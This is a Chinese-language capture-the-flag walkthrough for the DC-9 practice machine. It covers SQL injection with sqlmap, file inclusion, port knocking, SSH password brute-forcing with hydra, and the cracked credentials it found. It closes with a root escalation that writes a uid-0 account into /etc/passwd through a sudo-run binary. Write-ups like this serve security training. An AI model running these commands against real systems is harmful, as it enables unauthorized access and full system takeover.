DC 9

DC-9

nmap 扫描一下端口

在 web 的 search 界面找到一存在 sql 注入的页面，然后 sqlmap 跑出来 admin:transorbital1

在 manage 界面用 sqlmap 跑出来的用户名和密码登录，注意到下面有个 File does not exist，文件包含？

file 参数就能包含

burp 测出来的文件包含，注意那个 openSSH，他用了个叫 knockd 的软件，在连接 ssh 之前需要先“敲门”就是依次访问那些端口这样才能连接，这里是 7469,8475,9842

一开始 22 端口是关着的

可以用 knock -v 192.168.149.171 7469 8475 9842 来敲门
也可以 nmap 依次去扫描这些端口

这时候它的 22 端口已经打开了

可以使用之前 sqlmap 跑出来的那一些账户密码配合 hydra 爆破一波 ssh

写了个小脚本来把 sqlmap 跑出来的内容生成 user 和 password 的 txt 文件

# -*- coding: UTF-8 -*- 
f=open('temp.txt',"r")
user=open("user.txt","a")
passwd=open("pass.txt","a")
for line in f:
    temp = line.replace(" ","")
    a=temp.split("|")
    print(a)
    user.write(a[2]+"\n")
    passwd.write(a[6]+"\n")

然后 hydra 爆破一波

hydra -L user.txt -w 10 -P pass.txt -t 10 -v 192.168.149.171 ssh

-L user.txt        指定爆破账号字典为 user.txt
-w 10              设置最大超时时间10s，默认30s
-P pass.txt       指定密码字典为 pass.txt
-t 10               指定爆破线程为 10 个
-v                   指定显示爆破过程
-f                   查找到第一个可以使用的账号和密码的时候停止破解

chandlerb：UrAG0D!
janitor：Ilovepeepee
joeyt：Passw0rd

登上以后 janitor：Ilovepeepee 存在隐藏文件
把这些密码保存出来再来一遍 hydra 爆破

又多出来一个 login：B4-Tru3-001

登录之后 sudo -l 发现有个这个东西

尝试执行以下结果发现有个提示：

在这个目录的上两层，发现了 test.py

当传入的参数是三个的时候（第一个就是文件本身了）可以把第二个参数给读出来然后写到第三个文件后面，而且他还是有 root 权限的，所以只要能够个 test 传入

生成 hash
openssl passwd -1 -salt yichen 123456

然后写到 /tmp/passwd
echo 'yichen:$1$yichen$6nzFZVX5T21iu2AmBgzin/:0:0:yichen:/root:/bin/bash' > /tmp/passwd

运行 sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd
就会把我们写在 /tmp/passwd 的内容写到 /etc/passwd

这时候只需要 su yichen，输入密码：123456，就拥有了 root 权限

原文: https://www.yuque.com/hxfqg9/web/ug1xxf